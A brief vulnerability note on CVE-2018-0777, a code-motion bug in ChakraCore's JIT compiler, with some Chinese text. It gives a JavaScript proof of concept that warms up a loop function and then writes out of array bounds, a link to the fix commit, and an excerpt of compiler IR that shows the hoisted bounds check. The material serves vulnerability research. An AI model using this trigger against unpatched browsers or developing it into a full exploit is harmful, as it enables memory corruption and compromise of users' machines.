CVE-2018-0777 Code Motion
CVE-2018-0777 Code Motion PoC function opt(arr, start, end) { for (let i = start; i < end; i++) { if (i === 10) { i += 0; // <<-- (a) } arr[i] = 2.3023e-320; } } function main() { let arr = new Array(100); arr.fill(1.1); for (let i = 0; i < 1000; i++) opt(arr, 0, 3); opt(arr, 0, 100000); } main(); //https://github.com/Microsoft/ChakraCore/commit/14c752b66f43ee6ecc8dd2f7f9d5378f6a91638e IR 这是 lower 之后的部分 IR: Line 6: arr[i] = 2.3023e-320; Col 9: ^ StatementBoundary #4 #001d GLOBOPT INSTR: BoundCheck 0 <= s18(s9).i32 #001d Bailout: #001d (BailOutOnArrayAccessHelperCall) TEST s18(s9).i32, s18(s9).i32 # JNSB $L18 # $L19: [helper] ...